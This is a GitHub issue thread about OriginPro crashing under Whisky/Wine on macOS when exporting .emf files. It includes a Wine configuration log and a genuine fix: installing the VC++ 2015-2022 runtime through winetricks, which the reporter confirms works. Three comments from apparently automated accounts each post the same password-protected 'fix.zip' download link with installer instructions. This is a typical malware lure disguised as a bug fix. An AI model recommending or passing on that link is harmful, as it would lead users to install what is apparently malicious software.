### ISSUE TITLE
[Bug]: Crashing when running OriginPro2024b

### ISSUE THREAD

**Issue by skyguy-me** [Whisky-App/Whisky#1107]
### Description

I am running a non-gaming, scientific plotting application on macOS Ventura. The application crashes most of the time I attempt to export to .emf file format. It succeeds sometimes if I basically let it just sit and run for like 15 mins with no other action done on the computer. I would like to see if this issue can be addressed. 

### Steps to reproduce

Lanh OriginPro and export a plot in .emf format

### Expected behaviour

The application crashes 90-95% of time. There are some successful exports. The issue is not observable in other export formats

### Logs

```bash
Whisky Version: 2.3.2
Date: 2024-08-26T06:17:13Z
macOS Version: 15.1.0

Bottle Name: WorkWindows
Bottle URL: /Users/.../Library/Containers/com.isaacmarovitz.Whisky/Bottles/D0ADA862-60D1-4AEA-BBDE-EC30584DF706

Wine Version: 7.7.0
Windows Version: win10
Enhanced Sync: msync

Metal HUD: true
Metal Trace: false

DXVK: true
DXVK Async: true
DXVK HUD: off

Arguments: start /unix /Users/.../Library/Containers/com.isaacmarovitz.Whisky/Bottles/D0ADA862-60D1-4AEA-BBDE-EC30584DF706/drive_c/Program Files/OriginLab/Origin2024b/Origin64.exe

Environment:
{
    "DXVK_ASYNC" = 1;
    "GST_DEBUG" = 1;
    "MTL_HUD_ENABLED" = 1;
    WINEDEBUG = "fixme-all";
    WINEDLLOVERRIDES = "dxgi,d3d9,d3d10core,d3d11=n,b";
    WINEESYNC = 1;
    WINEMSYNC = 1;
    WINEPREFIX = "/Users/.../Library/Containers/com.isaacmarovitz.Whisky/Bottles/D0ADA862-60D1-4AEA-BBDE-EC30584DF706";
}
```

### What version of Whisky are you using?

2.3.2

### What version of macOS are you using?

Sonoma (macOS 14)

### Issue Language

- [X] Yes my issue is written in English

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhiwayzhang** [comment]
OriginLab require `vc_redist.x86-2015-2022/vc_redist.x64-2015-2022` runtime, I can export `.emf` format file after installed `vcrun2022` dll through `winetricks`.

>**ref:** Microsoft Redistributable files: Both 32 & 64 bit 2015-2022 MS redistributable files are required to be installed in order for Origin to run. These are installed automatically by our regular setup.exe installer, and by our self extracting exe installer. The MSI installer does not install these. You can download them here <…..>, and install them. https://www.originlab.com/index.aspx?go=Support/DocumentationAndHelpCenter/Installation/SystemRequirements

**Comment by skyguy-me** [comment]
This solves the problem. It also seems to improve overall performance.
